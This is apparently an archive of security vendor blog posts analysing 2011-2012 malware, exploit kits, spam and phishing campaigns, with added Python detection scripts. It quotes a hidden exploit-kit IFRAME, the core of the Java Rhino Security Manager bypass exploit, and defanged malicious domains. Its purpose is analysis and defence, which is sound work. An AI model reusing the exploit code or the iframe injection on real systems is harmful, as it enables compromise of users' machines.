MIDI Files – Mid-Way to Infection

By Arseny Levin  •  January 31st, 2012  •   Vulnerabilities

Microsoft’s January patch MS12-004 addressed a few vulnerabilities in Windows Media components. One particular issue, CVE-2012-0003, can be exploited via the Windows Media Player ActiveX control; it is a heap overflow in the ‘midiOutPlayNextPolyEvent’ function of the Windows Multimedia Library, winmm.dll. The bad guys didn’t waste time, and this vulnerability is now exploited in the wild, as reported by Trend Micro. A Web page hosted on a South Korean site loads a maliciously crafted MIDI file and sprays the heap. The attacker uses the exploitation method presented in Nicolas Joly’s blog at VUPEN: the attack allocates an HTML element of a specific size and eventually overwrites some of its data, thereby achieving malicious code execution.

The author of this page used a Korean JavaScript obfuscator to obfuscate a large block of code which hides the shellcode, as can be seen in the following code snippet. Notably, the obfuscated code generated by this tool changes itself several times during execution.


The code also ensures that it is executed only in Internet Explorer, because that is the only browser where this exploitation succeeds. After de-obfuscating the JavaScript code, we can analyze the shellcode itself. The author uses a common evasion technique: XOR encryption, with a decrypting loop in the prologue. This technique is usually very effective against signature-based detection engines.

The shellcode then imports and calls URLDownloadToFileA to download the payload, a packed executable, saving it under a nondescript name such as “a.exe”.

The executable is a downloader which fetches additional malware with rootkit capabilities. The author of the attack did a decent job of obfuscating the executable file, as a VirusTotal analysis shows:

All M86 Secure Web Gateway customers are protected from this attack by default, without needing to install any security update.

Massive Compromise of WordPress-based Sites but ‘Everything will be Fine’

By Daniel Chechik  •  January 30th, 2012  •   Cybercrime Malware

A few days ago, hundreds of websites based on WordPress 3.2.1 were compromised. The attacker uploaded an HTML page to the standard Uploads folder, and that page redirects the user to the Phoenix Exploit Kit. The exploit kit’s logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites:

Partial list of compromised WordPress websites
The content uploaded by the attacker is not part of the home page and will not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites other than the uploaded page will not infect the user’s machine. The general motivation for attackers to compromise websites is to bypass URL reputation mechanisms, spam filters and certain security policies.

To lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link, as described in the Websense blog. The link points to the aforementioned uploaded page.

The malicious uploaded page

The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:
<IFRAME style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px" src="hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php" frameborder="0"></IFRAME>

The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers.
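As an added defender-side example (not code from the original post), a small Python scanner that flags iframes carrying the hiding tricks seen in the injected tag above: zero width, an offset that pushes the frame far off-screen, and fixed positioning with no border. The sample HTML is constructed for this example and keeps the defanged hxxp:// URL.

```python
from html.parser import HTMLParser
import re

# Constructed sample: the injected IFRAME quoted above (defanged) plus a benign embed.
SAMPLE_HTML = """
<html><body>
<p>Welcome</p>
<IFRAME style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px"
        src="hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php" frameborder="0"></IFRAME>
<iframe src="https://example.com/video" width="640" height="360"></iframe>
</body></html>
"""

def _style_dict(style):
    """Parse an inline style attribute into a {property: value} dict (lower-cased)."""
    out = {}
    for decl in style.split(";"):
        if ":" in decl:
            k, v = decl.split(":", 1)
            out[k.strip().lower()] = v.strip().lower()
    return out

def _px(value):
    """Leading numeric part of a CSS length such as '-8710px'; None if absent."""
    m = re.match(r"-?\d+(\.\d+)?", value or "")
    return float(m.group()) if m else None

def iframe_suspicion(attrs):
    """Return the reasons an <iframe> looks like a hidden exploit-kit loader."""
    a = {k.lower(): (v or "") for k, v in attrs}
    style = _style_dict(a.get("style", ""))
    reasons = []
    for dim in ("width", "height"):          # collapsed to (near) zero size
        v = _px(style.get(dim, a.get(dim, "")))
        if v is not None and v <= 1:
            reasons.append(f"{dim} is {v:g}px")
    for side in ("left", "right", "top", "bottom"):  # pushed far outside the viewport
        v = _px(style.get(side))
        if v is not None and v < -1000:
            reasons.append(f"{side} offset {v:g}px puts the frame off-screen")
    if style.get("display") == "none" or style.get("visibility") == "hidden":
        reasons.append("css hides the element")
    if style.get("position") == "fixed" and a.get("frameborder") == "0":
        reasons.append("fixed position with no border")
    return reasons

class IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []   # (src, [reasons]) for each suspicious iframe

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            reasons = iframe_suspicion(attrs)
            if reasons:
                self.hits.append((dict(attrs).get("src", ""), reasons))

def scan_html(html):
    """Scan an HTML document and return the suspicious iframes found in it."""
    s = IframeScanner()
    s.feed(html)
    return s.hits

if __name__ == "__main__":
    for src, reasons in scan_html(SAMPLE_HTML):
        print(src, "->", "; ".join(reasons))
```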
The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:

The obfuscated Phoenix exploit page

The obfuscated page above generates code which attempts to exploit multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java, as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability, as shown in the following screenshot, taken from the original malicious server.

Statistics on Phoenix Exploit Kit control panel

Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF LibTIFF vulnerability. Even the MDAC vulnerability is successfully exploited, which is surprising given that it only exists in the old version 6 of Internet Explorer.

Interestingly enough, the “Browser statistics” chart in the screenshot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that the Chrome browser is explicitly excluded, for no obvious reason:

Phoenix Exploit Kit source code

All M86 Secure Web Gateway customers are protected against this attack by default: access to the exploit page is blocked.

As usual, stay safe and be careful not to click links in suspicious emails.

Zbot Trojan spreads through fake ConEdison billing notification email

By Rodel Mendrez  •  January 13th, 2012  •   Spam

Today we came across a new malicious spam campaign that is actively being sent out by the Cutwail spam botnet. The suspicious email claims to be a bill summary from the New York-based energy company Con Edison, Inc. It may use the subject line “ConEdison Billing Summary as of <DATE>”, and the attachment uses the filename format Billing-Summary-ConEdison-<random numbers>-<Date>.zip.

The attached zip file contains an executable file, which unsurprisingly is a Zbot malware variant. When extracted, the malicious executable uses no disguise: no fake Adobe Reader or Microsoft Word icon, no double file extension, and no excessive spaces in the file name to hide the .EXE extension. The attached file is so dull that average users should easily spot that it is suspicious.
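As an added example (not code from the original post), a Python triage routine for messages of this kind: it matches the subject and attachment naming pattern described above, opens any zip attachment, and reports members with executable extensions, also flagging the disguises the post says this sample did not bother with (double extensions, space padding before the extension). The .eml is constructed inline; the date layout in the file name and the dummy executable bytes are assumptions.

```python
import email
import io
import re
import zipfile
from email.message import EmailMessage

EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
# Campaign lure described in the post; the <random numbers>-<Date> layout is an assumption.
SUBJECT_RE = re.compile(r"^ConEdison Billing Summary as of ", re.I)
CAMPAIGN_NAME = re.compile(r"^Billing-Summary-ConEdison-\d+-[\d-]+\.zip$", re.I)

def build_sample_eml():
    """Constructed sample message imitating the campaign; the 'executable' is dummy bytes."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as z:
        z.writestr("Billing-Summary-ConEdison-48213-01132012.exe", b"MZ dummy, not a real program")
    msg = EmailMessage()
    msg["Subject"] = "ConEdison Billing Summary as of 01/13/2012"
    msg["From"] = "billing@example.invalid"
    msg.set_content("Please see the attached billing summary.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="Billing-Summary-ConEdison-48213-01132012.zip")
    return msg.as_bytes()

def suspicious_name(name):
    """Reasons an archive member name looks like a (possibly disguised) executable."""
    reasons = []
    stripped = name.rstrip()
    ext = stripped[stripped.rfind("."):].lower() if "." in stripped else ""
    if ext in EXEC_EXT:
        reasons.append(f"executable extension {ext}")
        if stripped.count(".") > 1:                     # e.g. invoice.pdf.exe
            reasons.append("double extension")
        if name != stripped or re.search(r" {3,}", name):  # spaces pushing .exe out of view
            reasons.append("whitespace padding hides the extension")
    return reasons

def analyze_eml(raw):
    """Return findings for lure indicators and zip attachments carrying executables."""
    msg = email.message_from_bytes(raw)
    findings = []
    if SUBJECT_RE.match(msg["Subject"] or ""):
        findings.append("subject matches ConEdison billing lure")
    for part in msg.walk():
        fname = part.get_filename()
        if not fname or part.get_content_type() != "application/zip":
            continue
        if CAMPAIGN_NAME.match(fname):
            findings.append(f"attachment name {fname} matches campaign pattern")
        try:
            archive = zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True)))
        except zipfile.BadZipFile:
            findings.append(f"{fname}: not a valid zip")
            continue
        for member in archive.namelist():
            for reason in suspicious_name(member):
                findings.append(f"{fname} -> {member}: {reason}")
    return findings

if __name__ == "__main__":
    for line in analyze_eml(build_sample_eml()):
        print(line)
```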

The good news is that when this particular Zbot sample was run, it failed to communicate with its command and control (CnC) server at plantlunch[dot]ru, which turns out to be currently offline.

In conclusion, bill notifications do not usually arrive with an executable file, so emails like this should be treated with extreme suspicion. When you see these obvious signs of malware, just stop and delete the email. M86 MailMarshal customers were protected against this campaign from the moment it began.

Web Hijacks with AJAX

By Moshe Basanchig  •  January 3rd, 2012  •   Malware

Malware authors always seem to closely monitor trends in Web security development in order to create a variety of browser-based attacks. Just to name a few, techniques such as code obfuscation, plug-in detection and affiliate management are often used.

This is why we at M86 Security weren’t surprised to see a malicious site which loads parts of its attack using AJAX (Asynchronous JavaScript and XML), a method for client-side code to exchange data asynchronously with web servers. The following attack was observed on a currently running server located in China, which is serving malware. So how does this work?

First, there’s a web-page, containing JavaScript code that fetches the other parts of the attack:

loader function

This code is very similar to code commonly used in many web pages nowadays. The main difference is the extra parameters it accepts, which are used to “cut” certain parts out of the received content so that they can be processed and executed as code later on.

Next, the returned code is used by the exploit. In this case, the code is shellcode:

shellcode

It’s simple. Using the exact same technique, this web page can load various browser or plugin exploit attempts. In this specific case, the page loads a SWF file exploiting CVE-2010-1297. Other pages on this server are exploiting CVE-2010-0806 and CVE-2010-0249.

The main reason malware authors use AJAX is the ability to write generic attack pages which look benign and become malicious only once the dynamic content is loaded. This is also very useful for evading AV detection, since tiny bits of the attack can be loaded one at a time, making it very difficult to write a signature.

Needless to say, M86 SWG customers are protected from such exploitation attempts.

Prevalent Exploit Kits Updated with a New Java Exploit

By Daniel Chechik  •  December 16th, 2011  •   Cybercrime Malware Vulnerabilities

Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with new exploits that had been discovered in the wild. However, in the past few weeks, authors have released updated versions of their kits with a new exploit before a patch had been released.

First, a new version of the Blackhole exploit kit was released, version 1.2.1:

Live Blackhole Exploit Kit control panel

The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.

A few days later, a new version of the Phoenix exploit kit, 3.0, was released, just a few weeks after the release of its predecessor, Phoenix 2.9.

Live Phoenix Exploit Kit 3.0 control panel

Notice the red boxes in the screenshots above: a new exploit was added to those exploit kits, which is the reason for the upgrade.

A few weeks ago Michael ‘mihi’ Schierl described a design error in Java. Basically, this vulnerability is similar to other Java vulnerabilities where untrusted code is executed with elevated privileges. Rhino is a JavaScript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine protection by generating an error object from a Rhino script, which runs with elevated privileges, and executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.

Not long after the discovery, an exploit module was published in Metasploit. First, the code binds a Rhino object with the applet:

import javax.script.*;

ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings b = engine.createBindings();
b.put("applet", this);

The Java code executes a script that bypasses the Security Manager protection by using the “toString” method inside a script context:

Object proxy = (Object) engine.eval(
"this.toString = function() {" +
"                      java.lang.System.setSecurityManager(null);" +
"                      applet.callBack();" +
"                      return String.fromCharCode(97 + Math.round(Math.random() * 25));" +
"};" +
"e = new Error();" +
"e.message = this;" +
"e", b);

The script throws an exception, and the rest of the code is then executed:

catch (ScriptException e) {
e.printStackTrace();
}

The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective, and therefore authors of exploit kits rushed to add it to their kits. The concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.

Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.

We highly encourage users to keep their Java updated, or to remove it if it is not needed. A patch for this Java vulnerability is now available: look for Java 6 Update 29 or Java 7 Update 1.

A new Adobe 0-day In the Wild – But No Worries, You are Already Protected with Our Secure Web Gateway!

By Anat Davidi  •  December 7th, 2011  •   Vulnerabilities

Yesterday Adobe released an advisory for a vulnerability in the Adobe Reader and Adobe Acrobat products. The vulnerability, titled ‘U3D Memory Corruption Vulnerability’, was part of a targeted attack and was discovered by Lockheed Martin’s Computer Incident Response Team. This is not the first time a targeted attack has been aimed at the US defense industry.

This attack involves embedding a maliciously crafted Universal 3D (U3D) stream in a PDF file. It is one of several examples of attacks on embedded streams within PDF files, and represents a growing attack vector because it can get around defense mechanisms such as DEP and ASLR (two techniques meant to help prevent unauthorized code execution) using known techniques such as JIT spraying.

According to Adobe’s blog post released alongside the advisory, Adobe is planning to release an update for Adobe Reader 9, the version targeted by this vulnerability, “no later than the week of December 12, 2011”. The rest of its supported versions will receive updates as part of their quarterly updates in January 2012.

M86 Secure Web Gateway, version 9.2 and above, provides zero-day protection against this attack, without requiring any further updates. Customers who wish to monitor the attack in their organization may look for attacks that are tagged with the “Adobe Universal 3D streams” block message.

We’re proud that our proactive rules block this new zero-day exploit and we’ll continue to work hard to provide this level of protection to our customers in the future.

Cutwail Spam Campaigns Lure Users to Blackhole Exploit Kit

By Rodel Mendrez  •  December 1st, 2011  •   Spam

Over the past few days the Cutwail botnet has been sending out malicious spam campaigns with a variety of themes, such as airline ticket orders, Automated Clearing House (ACH), Facebook notifications, and scanned documents. These campaigns do not carry malware attachments; instead, the payload is delivered via links to malicious code hosted on the web.

The subject lines used in the Facebook spam campaign are similar to those in the image below. Notice that they use varying letter case and random Facebook profile names.

The message body may look like a legitimate Facebook notification. However, closer inspection reveals the underlying link redirecting to a malicious web page.
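As an added example (not code from the original post), a Python check for the trick described above: an anchor whose visible text names one domain while its href leads somewhere else. The sample message body is constructed; the compromised host name is a placeholder, and the "registrable domain" logic is a deliberate simplification (a public-suffix list would be used in production).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Constructed sample body imitating the notification; the redirect host is a placeholder.
SAMPLE_BODY = """
<p>You have 1 new notification.</p>
<a href="http://compromised-host.example/redirect.html">http://www.facebook.com/n/?notifications</a>
<a href="https://www.facebook.com/settings">unsubscribe</a>
"""

# Something that looks like a host name inside visible link text, with or without a scheme.
DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?((?:[\w-]+\.)+[a-z]{2,})", re.I)

def _host(url):
    return (urlparse(url.strip()).hostname or "").lower()

def _registered(host):
    # Assumption: the registrable domain is the last two labels (good enough for .com/.ru style names).
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host

class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def mismatched_links(html):
    """Return (href, text, reason) for anchors whose text names a domain other than the href's."""
    collector = LinkCollector()
    collector.feed(html)
    hits = []
    for href, text in collector.links:
        m = DOMAIN_IN_TEXT.search(text)
        if not m:
            continue                       # plain wording such as "unsubscribe": nothing to compare
        text_dom = _registered(m.group(1).lower())
        href_dom = _registered(_host(href))
        if text_dom != href_dom:
            hits.append((href, text, f"text names {text_dom} but href goes to {href_dom}"))
    return hits

if __name__ == "__main__":
    for href, text, reason in mismatched_links(SAMPLE_BODY):
        print(f"{text} -> {href}: {reason}")
```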

Another campaign spammed out by Cutwail claims to be a flight ticket order. The spam can be easily spotted by its subject lines. It looks like a “forwarded” or “reply” email and uses the subject format shown in the image below.

Here is an example of the message:

There are two things you should notice about this particular spam campaign. Firstly, the visible URL does not conform to the URI naming scheme, as it has no top-level domain, a clumsy mistake by the spammers. Other similar messages use “www.airlines.com”, which is a parked domain. Secondly, “Airlines America” in the signature block is not a real airline company, unless the spammers meant to imply American Airlines.

Two other spam campaigns resurfaced this week, namely the “Automated Clearing House (ACH)” and the “scanned document”.

The link in these campaigns points to a compromised web server that serves a small HTML file. That HTML file contains a malicious iframe which opens a Blackhole exploit kit landing page. This is the same exploit kit used in previous spam campaigns, such as the “Steve Jobs is Alive” and fake LinkedIn notifications.

If you are a system administrator, you may want to block the following exploit kit landing pages.

  • crredret[dot]ru/main.php
  • www[dot]btredret[dot]ru/main.php
  • bqredret[dot]ru/main.php

At the time of analysis, loading the exploit kit web page downloaded SpyEye and the Bobax spambot onto our vulnerable hosts.

TrueType but not Truly Safe: The New Zero-Day Event

By Ziv Mador  •  November 8th, 2011  •   Vulnerabilities

A new vulnerability in Windows, CVE-2011-3402, has been recently identified and is already exploited in the wild. For now, only a handful of targeted attacks have been found. The vulnerability exists in the Windows TrueType Font Parsing Engine and affects most Windows versions, including Windows 7. An attack involves a file which has a maliciously crafted TrueType font file (TTF) embedded in it. There are several file formats that use TrueType fonts, for example, the file formats of Microsoft Office and Adobe Acrobat Reader. In the currently known targeted attacks, a Microsoft Word document was used. Once rendered on a vulnerable system, parsing the TTF file may end up with execution of malicious code. Microsoft has released an advisory for this issue and also released a FixIt tool as a workaround. It disables access to the system file T2embed.dll in order to avoid TrueType font processing. However, a word of caution: applications that use these fonts may break after this workaround is deployed.

In the known attacks, the installed malware is known as Duqu. The Laboratory of Cryptography and System Security (CrySyS) at Budapest University first reported these attacks, and they were thoroughly investigated by that team and by Symantec in the following article.

M86 Security Secure Web Gateway (SWG) can be deployed with three possible antivirus scanners, Kaspersky, McAfee and Sophos, and all three have already released protection. No additional Security Update by M86 Security is required. In addition, we are investigating adding more layers of protection in the future. Keep in mind that these attacks are currently not delivered via the web browser, but that can obviously change in the future.

We will continue to monitor the situation and update this blog post as necessary.

“Steve Jobs Alive!” Spam Campaign Leads To Exploit Page

By Rodel Mendrez  •  October 7th, 2011  •   Spam Vulnerabilities

It was a sad day in the technology industry with the recent passing of Apple’s legendary leader, Steve Jobs. Unfortunately, cyber-criminals see this as an opportunity. Today we started seeing a Steve Jobs spam campaign, with subjects suggesting that he is still alive:

Steve Jobs Alive!

Steve Jobs Not Dead!

Steve Jobs: Not Dead Yet!

Is Steve Jobs Really Dead?

Sample of the Steve Jobs spam campaign

The URL links in the spam are many and varied. The websites they point to all appear to have been hacked through the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a Blackhole exploit kit landing page.

The HTML source code of the Blackhole Exploit kit landing page

The intermediary redirect URLs are random-looking domains with a top-level domain of .ms (Montserrat, in case you didn’t know). Here are some examples:

  • hxxp://xnyiinobfb[dot]ce[dot]ms/index.php
  • hxxp://derhvbq[dot]ce[dot]ms/index.php

The purpose of the exploit kit is to try to exploit vulnerabilities on the system and eventually download malicious executable files. At this stage we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.

Unfortunately, many people may find this spam campaign “click-worthy”, given the icon that Steve Jobs was. The usual advice applies: avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.

New Google AdWords Phish In-the-wild

By Rodel Mendrez  •  October 4th, 2011  •   Phishing

For those of you who have a Google AdWords account, be wary of a new Google AdWords spam campaign we have seen in the wild earlier this week. The spam email may use the following subject lines:

Google AdWords: You have a new alert.

Google Team: You have a new alert

Here is an example of the spam email posing as a notification email from Google AdWords.

Notice that in the sample email, the link that appears to lead to your AdWords account looks dodgy. But if that obvious sign didn’t stop you from clicking the link, you would have been redirected to a Google AdWords phishing web page.

After the user enters a username and password, the web page sends these credentials to the cyber-criminal’s web server.

The HTTP POST request sent when the user enters their Google account credentials: it submits the username and password to the phisher’s web page.

Of course, entering your Google account credentials in the phishing page will NOT just compromise your Google AdWords account: all your Google services, such as Gmail or Google+, will be affected as well. When you receive these sorts of notification emails, always double-check the URL before you click on it. If it looks suspicious, it probably is.